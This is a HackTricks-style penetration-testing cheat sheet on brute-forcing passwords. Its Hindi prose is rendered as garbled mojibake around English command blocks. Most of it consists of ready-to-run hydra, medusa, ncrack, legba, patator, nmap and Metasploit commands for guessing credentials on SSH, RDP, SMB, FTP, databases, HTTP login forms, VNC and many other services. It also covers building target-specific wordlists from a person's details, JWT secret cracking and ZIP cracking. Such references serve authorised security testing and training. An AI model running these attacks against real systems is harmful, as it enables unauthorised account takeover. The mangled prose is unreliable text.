Trickest рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ рддрд╛рдХрд┐ рдЖрдк рджреБрдирд┐рдпрд╛ рдХреЗ рд╕рдмрд╕реЗ рдЙрдиреНрдирдд рд╕рд╛рдореБрджрд╛рдпрд┐рдХ рдЙрдкрдХрд░рдгреЛрдВ рджреНрд╡рд╛рд░рд╛ рд╕рдВрдЪрд╛рд▓рд┐рдд рдХрд╛рд░реНрдпрдкреНрд░рд╡рд╛рд╣реЛрдВ рдХреЛ рдЖрд╕рд╛рдиреА рд╕реЗ рдмрдирд╛ рдФрд░ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рдХрд░ рд╕рдХреЗрдВред
рдЖрдЬ рд╣реА рдПрдХреНрд╕реЗрд╕ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ:
HackTricks рдХрд╛ рд╕рдорд░реНрдерди рдХрд░реЗрдВ
рд╣реИрдХрд┐рдВрдЧ рдЯреНрд░рд┐рдХреНрд╕ рд╕рд╛рдЭрд╛ рдХрд░реЗрдВ рдФрд░ HackTricks рдФрд░ HackTricks Cloud рдЧрд┐рдЯрд╣рдм рд░рд┐рдкреЛрдЬрд┐рдЯрд░реА рдореЗрдВ PR рд╕рдмрдорд┐рдЯ рдХрд░реЗрдВред
Default Credentials
рдкреНрд░реМрджреНрдпреЛрдЧрд┐рдХреА рдХреЗ рд▓рд┐рдП рдбрд┐рдлрд╝реЙрд▓реНрдЯ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓реНрд╕ рдХреЗ рд▓рд┐рдП рдЧреВрдЧрд▓ рдореЗрдВ рдЦреЛрдЬреЗрдВ, рдпрд╛ рдЗрди рд▓рд┐рдВрдХреНрд╕ рдХреЛ рдЖрдЬрдорд╛рдПрдВ :
рдЕрдкрдиреА рдЦреБрдж рдХреА рд╢рдмреНрджрдХреЛрд╢ рдмрдирд╛рдПрдВ
рд▓рдХреНрд╖реНрдп рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЬрд┐рддрдиреА рд╕рдВрднрд╡ рд╣реЛ рд╕рдХреЗ рдЬрд╛рдирдХрд╛рд░реА рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ рдФрд░ рдПрдХ рдХрд╕реНрдЯрдо рд╢рдмреНрджрдХреЛрд╢ рдЙрддреНрдкрдиреНрди рдХрд░реЗрдВред рдЙрдкрдпреЛрдЧреА рдЙрдкрдХрд░рдг:
Crunch
Copy crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)
@ Lower case alpha characters
, Upper case alpha characters
% Numeric characters
^ Special characters including spac
crunch 6 8 -t ,@@^^%%
Cewl
Copy cewl example.com -m 5 -w words.txt
рд╢рд┐рдХрд╛рд░ рдХреЗ рдмрд╛рд░реЗ рдореЗрдВ рдЖрдкрдХреЗ рдЬреНрдЮрд╛рди рдХреЗ рдЖрдзрд╛рд░ рдкрд░ рдкрд╛рд╕рд╡рд░реНрдб рдЙрддреНрдкрдиреНрди рдХрд░реЗрдВ (рдирд╛рдо, рддрд┐рдерд┐рдпрд╛рдБ...)
рдПрдХ рд╡рд░реНрдбрд▓рд┐рд╕реНрдЯ рдЬрдирд░реЗрдЯрд░ рдЯреВрд▓, рдЬреЛ рдЖрдкрдХреЛ рд╢рдмреНрджреЛрдВ рдХрд╛ рдПрдХ рд╕реЗрдЯ рдкреНрд░рджрд╛рди рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ, рдЬрд┐рд╕рд╕реЗ рдЖрдкрдХреЛ рджрд┐рдП рдЧрдП рд╢рдмреНрджреЛрдВ рд╕реЗ рдХрдИ рднрд┐рдиреНрдирддрд╛рдПрдБ рдмрдирд╛рдиреЗ рдХреА рд╕рдВрднрд╛рд╡рдирд╛ рдорд┐рд▓рддреА рд╣реИ, рдПрдХ рдЕрджреНрд╡рд┐рддреАрдп рдФрд░ рдЖрджрд░реНрд╢ рд╡рд░реНрдбрд▓рд┐рд╕реНрдЯ рдмрдирд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдЬрд┐рд╕рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рд╕реА рд╡рд┐рд╢реЗрд╖ рд▓рдХреНрд╖реНрдп рдХреЗ рд╕рдВрдмрдВрдз рдореЗрдВ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХреЗред
Copy python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst
__ _______ _____ _______ ______ _____
\ \ / /_ _ | / ____ | __ __ | ____ | __ \
\ \ / \ / / | | | ( ___ | | | | __ | | __ ) |
\ \/ \/ / | | \___ \ | | | __ | | _ /
\ / \ / _ | | _ ____ ) | | | | | ____ | | \ \
\/ \/ | _____ | _____/ | _ | | ______ | _ | \_\
Version 1.0.3 Cycurity
Generating wordlist...
[########################################] 100%
Generated 67885 lines.
Finished in 0.920s.
Wordlists
Trickest рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ рддрд╛рдХрд┐ рдЖрдк рджреБрдирд┐рдпрд╛ рдХреЗ рд╕рдмрд╕реЗ рдЙрдиреНрдирдд рд╕рд╛рдореБрджрд╛рдпрд┐рдХ рдЙрдкрдХрд░рдгреЛрдВ рджреНрд╡рд╛рд░рд╛ рд╕рдВрдЪрд╛рд▓рд┐рдд рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рдХрд╛рд░реНрдпрдкреНрд░рд╡рд╛рд╣ рдЖрд╕рд╛рдиреА рд╕реЗ рдмрдирд╛ рд╕рдХреЗрдВред
рдЖрдЬ рд╣реА рдПрдХреНрд╕реЗрд╕ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ:
Services
рд╕реЗрд╡рд╛ рдирд╛рдо рдХреЗ рдЕрдиреБрд╕рд╛рд░ рд╡рд░реНрдгрд╛рдиреБрдХреНрд░рдо рдореЗрдВ рдХреНрд░рдордмрджреНрдзред
AFP
Copy nmap -p 548 --script afp-brute < I P >
msf > use auxiliary/scanner/afp/afp_login
msf > set BLANK_PASSWORDS true
msf > set USER_AS_PASS true
msf > set PASS_FILE < PATH_PASSWD S >
msf > set USER_FILE < PATH_USER S >
msf > run
AJP
Copy nmap --script ajp-brute -p 8009 < I P >
AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM рдФрд░ Solace)
Copy legba amqp --target localhost:5672 --username admin --password data/passwords.txt [--amql-ssl]
рдХреИрд╕реЗрдВрдбреНрд░рд╛
Copy nmap --script cassandra-brute -p 9160 < I P >
# legba ScyllaDB / Apache Casandra
legba scylla --username cassandra --password wordlists/passwords.txt --target localhost:9042
CouchDB
Copy msf > use auxiliary/scanner/couchdb/couchdb_login
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
рдбреЙрдХрд░ рд░рдЬрд┐рд╕реНрдЯреНрд░реА
Copy hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/
Elasticsearch
Copy hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
FTP
Copy hydra -l root -P passwords.txt [-t 32] < I P > ftp
ncrack -p 21 --user root -P passwords.txt < I P > [-T 5]
medusa -u root -P 500-worst-passwords.txt -h < I P > -M ftp
legba ftp --username admin --password wordlists/passwords.txt --target localhost:21
HTTP Generic Brute
HTTP Basic Auth
Copy hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
# Use https-get mode for https
medusa -h < I P > -u < usernam e > -P < passwords.tx t > -M http -m DIR:/path/to/auth -T 10
legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/
HTTP - NTLM
Copy legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
legba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
HTTP - рдкреЛрд╕реНрдЯ рдлреЙрд░реНрдо
Copy hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
# Use https-post-form mode for https
For https you have to change from "http-post-form" to "https-post-form"
HTTP - CMS -- (W)рд░реНрдбрдкреНрд░реЗрд╕, (J)реВрдорд▓рд╛ рдпрд╛ (D)реНрд░реБрдкрд▓ рдпрд╛ (M)реВрдбрд▓
Copy cmsmap -f W/J/D/M -u a -p a https://wordpress.com
# Check also https://github.com/evilsocket/legba/wiki/HTTP
IMAP
Copy hydra -l USERNAME -P /path/to/passwords.txt -f < I P > imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f < I P > imap -V
nmap -sV --script imap-brute -p < POR T > < I P >
legba imap --username user --password data/passwords.txt --target localhost:993
IRC
Copy nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p < POR T > < I P >
ISCSI
Copy nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 < I P >
JWT
Copy #hashcat
hashcat -m 16500 -a 0 jwt.txt . \w ordlists \r ockyou.txt
#https://github.com/Sjord/jwtcrack
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
#John
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256
#https://github.com/ticarpi/jwt_tool
python3 jwt_tool.py -d wordlists.txt < JWT toke n >
#https://github.com/brendan-rius/c-jwt-cracker
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8
#https://github.com/mazen160/jwt-pwn
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt
#https://github.com/lmammino/jwt-cracker
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6
LDAP
Copy nmap --script ldap-brute -p 389 < I P >
legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords.txt --ldap-domain example.org --single-match
MQTT
Copy ncrack mqtt://127.0.0.1 --user test тАУP /root/Desktop/pass.txt -v
legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt
рдореЛрдВрдЧреЛ
Copy nmap -sV --script mongodb-brute -n -p 27017 < I P >
use auxiliary/scanner/mongodb/mongodb_login
legba mongodb --target localhost:27017 --username root --password data/passwords.txt
MSSQL
Copy legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433
MySQL
Copy # hydra
hydra -L usernames.txt -P pass.txt < I P > mysql
# msfconsole
msf > use auxiliary/scanner/mysql/mysql_login ; set VERBOSE false
# medusa
medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql
#Legba
legba mysql --username root --password wordlists/passwords.txt --target localhost:3306
OracleSQL
Copy patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
#msf1
msf > use admin/oracle/oracle_login
msf > set RHOSTS < I P >
msf > set RPORT 1521
msf > set SID < SI D >
#msf2, this option uses nmap and it fails sometimes for some reason
msf > use scanner/oracle/oracle_login
msf > set RHOSTS < I P >
msf > set RPORTS 1521
msf > set SID < SI D >
#for some reason nmap fails sometimes when executing this script
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid= < SI D > < I P >
legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin --password data/passwords.txt
oracle_login рдХрд╛ patator рдХреЗ рд╕рд╛рде рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЖрдкрдХреЛ install рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ:
Copy pip3 install cx_Oracle --upgrade
Offline OracleSQL hash bruteforce (рд╕рдВрд╕реНрдХрд░рдг 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, рдФрд░ 11.2.0.3 ):
Copy nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
POP
Copy hydra -l USERNAME -P /path/to/passwords.txt -f < I P > pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f < I P > pop3 -V
# Insecure
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:110
# SSL
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:995 --pop3-ssl
PostgreSQL
Copy hydra -L /root/Desktop/user.txt тАУP /root/Desktop/pass.txt < I P > postgres
medusa -h < I P > тАУU /root/Desktop/user.txt тАУP /root/Desktop/pass.txt тАУM postgres
ncrack тАУv тАУU /root/Desktop/user.txt тАУP /root/Desktop/pass.txt < I P > :5432
patator pgsql_login host= < I P > user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 < I P >
legba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432
PPTP
рдЖрдк .deb
рдкреИрдХреЗрдЬ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ https://http.kali.org/pool/main/t/thc-pptp-bruter/ рд╕реЗ рдЗрдВрд╕реНрдЯреЙрд▓ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдПред
Copy sudo dpkg -i thc-pptp-bruter*.deb #Install the package
cat rockyou.txt | thc-pptp-bruter тАУu < Usernam e > < I P >
RDP
Copy ncrack -vv --user < Use r > -P pwds.txt rdp:// < I P >
hydra -V -f -L < userslis t > -P < passwlis t > rdp:// < I P >
legba rdp --target localhost:3389 --username admin --password data/passwords.txt [--rdp-domain <RDP_DOMAIN>] [--rdp-ntlm] [--rdp-admin-mode] [--rdp-auto-logon]
Redis
Copy msf > use auxiliary/scanner/redis/redis_login
nmap --script redis-brute -p 6379 < I P >
hydra тАУP /path/pass.txt redis:// < I P > : < POR T > # 6379 is the default
legba redis --target localhost:6379 --username admin --password data/passwords.txt [--redis-ssl]
Rexec
Copy hydra -l < usernam e > -P < password_fil e > rexec:// < Victim-I P > -v -V
Rlogin
Copy hydra -l < usernam e > -P < password_fil e > rlogin:// < Victim-I P > -v -V
Rsh
Copy hydra -L < Username_lis t > rsh:// < Victim_I P > -v -V
http://pentestmonkey.net/tools/misc/rsh-grind
Rsync
Copy nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 < I P >
RTSP
Copy hydra -l root -P passwords.txt < I P > rtsp
SFTP
Copy legba sftp --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22
SNMP
Copy msf > use auxiliary/scanner/snmp/snmp_login
nmap -sU --script snmp-brute < targe t > [--script-args snmp-brute.communitiesdb= < wordlis t > ]
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt < I P >
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
SMB
Copy nmap --script smb-brute -p 445 < I P >
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
legba smb --target share.company.com --username admin --password data/passwords.txt [--smb-workgroup <SMB_WORKGROUP>] [--smb-share <SMB_SHARE>]
SMTP
Copy hydra -l < usernam e > -P /path/to/passwords.txt < I P > smtp -V
hydra -l < usernam e > -P /path/to/passwords.txt -s 587 < I P > -S -v -V #Port 587 for SMTP with SSL
legba smtp --username admin@example.com --password wordlists/passwords.txt --target localhost:25 [--smtp-mechanism <mech>]
SOCKS
Copy nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt
# With alternative address
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address 'internal.company.com' --socks5-port 8080
SQL Server
Copy #Use the NetBIOS name of the machine as domain
crackmapexec mssql < I P > -d < Domain Nam e > -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt тАУP /root/Desktop/pass.txt < I P > mssql
medusa -h < I P > тАУU /root/Desktop/user.txt тАУP /root/Desktop/pass.txt тАУM mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT
SSH
Copy hydra -l root -P passwords.txt [-t 32] < I P > ssh
ncrack -p 22 --user root -P passwords.txt < I P > [-T 5]
medusa -u root -P 500-worst-passwords.txt -h < I P > -M ssh
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
legba ssh --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22
рдХрдордЬреЛрд░ SSH рдХреБрдВрдЬреА / рдбреЗрдмрд┐рдпрди рдкреВрд░реНрд╡рд╛рдиреБрдорд╛рдирд┐рдд PRNG
рдХреБрдЫ рд╕рд┐рд╕реНрдЯрдо рдореЗрдВ рдХреНрд░рд┐рдкреНрдЯреЛрдЧреНрд░рд╛рдлрд┐рдХ рд╕рд╛рдордЧреНрд░реА рдЙрддреНрдкрдиреНрди рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдкрдпреЛрдЧ рдХрд┐рдП рдЬрд╛рдиреЗ рд╡рд╛рд▓реЗ рдпрд╛рджреГрдЪреНрдЫрд┐рдХ рдмреАрдЬ рдореЗрдВ рдЬреНрдЮрд╛рдд рджреЛрд╖ рд╣реЛрддреЗ рд╣реИрдВред рдЗрд╕рдХрд╛ рдкрд░рд┐рдгрд╛рдо рдХреБрдВрдЬреА рд╕реНрдерд╛рди рдореЗрдВ рдирд╛рдЯрдХреАрдп рд░реВрдк рд╕реЗ рдХрдореА рд╣реЛ рд╕рдХрддреА рд╣реИ рдЬрд┐рд╕реЗ snowdroppe/ssh-keybrute рдЬреИрд╕реЗ рдЙрдкрдХрд░рдгреЛрдВ рдХреЗ рд╕рд╛рде рдмреНрд░реВрдЯрдлреЛрд░реНрд╕ рдХрд┐рдпрд╛ рдЬрд╛ рд╕рдХрддрд╛ рд╣реИред рдХрдордЬреЛрд░ рдХреБрдВрдЬрд┐рдпреЛрдВ рдХреЗ рдкреВрд░реНрд╡-рдирд┐рд░реНрдорд┐рдд рд╕реЗрдЯ рднреА рдЙрдкрд▓рдмреНрдз рд╣реИрдВ рдЬреИрд╕реЗ g0tmi1k/debian-ssh ред
STOMP (ActiveMQ, RabbitMQ, HornetQ рдФрд░ OpenMQ)
STOMP рдЯреЗрдХреНрд╕реНрдЯ рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдПрдХ рд╡реНрдпрд╛рдкрдХ рд░реВрдк рд╕реЗ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рдиреЗ рд╡рд╛рд▓рд╛ рдореИрд╕реЗрдЬрд┐рдВрдЧ рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рд╣реИ рдЬреЛ рд▓реЛрдХрдкреНрд░рд┐рдп рдореИрд╕реЗрдЬ рдХрддрд╛рд░ рд╕реЗрд╡рд╛рдУрдВ рдЬреИрд╕реЗ RabbitMQ, ActiveMQ, HornetQ, рдФрд░ OpenMQ рдХреЗ рд╕рд╛рде рдирд┐рд░реНрдмрд╛рдз рд╕рдВрдЪрд╛рд░ рдФрд░ рдЗрдВрдЯрд░реИрдХреНрд╢рди рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред рдпрд╣ рд╕рдВрджреЗрд╢реЛрдВ рдХрд╛ рдЖрджрд╛рди-рдкреНрд░рджрд╛рди рдХрд░рдиреЗ рдФрд░ рд╡рд┐рднрд┐рдиреНрди рдореИрд╕реЗрдЬрд┐рдВрдЧ рд╕рдВрдЪрд╛рд▓рди рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ рдорд╛рдирдХреАрдХреГрдд рдФрд░ рдХреБрд╢рд▓ рджреГрд╖реНрдЯрд┐рдХреЛрдг рдкреНрд░рджрд╛рди рдХрд░рддрд╛ рд╣реИред
Copy legba stomp --target localhost:61613 --username admin --password data/passwords.txt
рдЯреЗрд▓рдиреЗрдЯ
Copy hydra -l root -P passwords.txt [-t 32] < I P > telnet
ncrack -p 23 --user root -P passwords.txt < I P > [-T 5]
medusa -u root -P 500-worst-passwords.txt -h < I P > -M telnet
legba telnet \
--username admin \
--password wordlists/passwords.txt \
--target localhost:23 \
--telnet-user-prompt "login: " \
--telnet-pass-prompt "Password: " \
--telnet-prompt ":~$ " \
--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin
VNC
Copy hydra -L /root/Desktop/user.txt тАУP /root/Desktop/pass.txt -s < POR T > < I P > vnc
medusa -h < I P > тАУu root -P /root/Desktop/pass.txt тАУM vnc
ncrack -V --user root -P /root/Desktop/pass.txt < I P > : > PO R > T
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt тАУt 1 тАУx retry:fgep!='Authentication failure' --max-retries 0 тАУx quit:code=0
use auxiliary/scanner/vnc/vnc_login
nmap -p 5900,5901 --script vnc-brute --script-args brute.credfile=wordlist.txt < I P >
legba vnc --target localhost:5901 --password data/passwords.txt
#Metasploit
use auxiliary/scanner/vnc/vnc_login
set RHOSTS < i p >
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst
Winrm
Copy crackmapexec winrm < I P > -d < Domain Nam e > -u usernames.txt -p passwords.txt
Trickest рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ рддрд╛рдХрд┐ рдЖрдк рджреБрдирд┐рдпрд╛ рдХреЗ рд╕рдмрд╕реЗ рдЙрдиреНрдирдд рд╕рд╛рдореБрджрд╛рдпрд┐рдХ рдЙрдкрдХрд░рдгреЛрдВ рджреНрд╡рд╛рд░рд╛ рд╕рдВрдЪрд╛рд▓рд┐рдд рдХрд╛рд░реНрдпрдкреНрд░рд╡рд╛рд╣реЛрдВ рдХреЛ рдЖрд╕рд╛рдиреА рд╕реЗ рдмрдирд╛ рдФрд░ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рдХрд░ рд╕рдХреЗрдВред
рдЖрдЬ рд╣реА рдПрдХреНрд╕реЗрд╕ рдкреНрд░рд╛рдкреНрдд рдХрд░реЗрдВ:
рд╕реНрдерд╛рдиреАрдп
рдСрдирд▓рд╛рдЗрди рдХреНрд░реИрдХрд┐рдВрдЧ рдбреЗрдЯрд╛рдмреЗрд╕
https://shuck.sh/get-shucking.php (MSCHAPv2/PPTP-VPN/NetNTLMv1 рдХреЗ рд╕рд╛рде/рдмрд┐рдирд╛ ESS/SSP рдФрд░ рдХрд┐рд╕реА рднреА рдЪреБрдиреМрддреА рдХреЗ рдорд╛рди рдХреЗ рд╕рд╛рде)
рд╣реИрд╢ рдХреЛ рдмреНрд░реВрдЯ рдлреЛрд░реНрд╕ рдХрд░рдиреЗ рд╕реЗ рдкрд╣рд▓реЗ рдЗрд╕реЗ рджреЗрдЦреЗрдВред
ZIP
Copy #sudo apt-get install fcrackzip
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip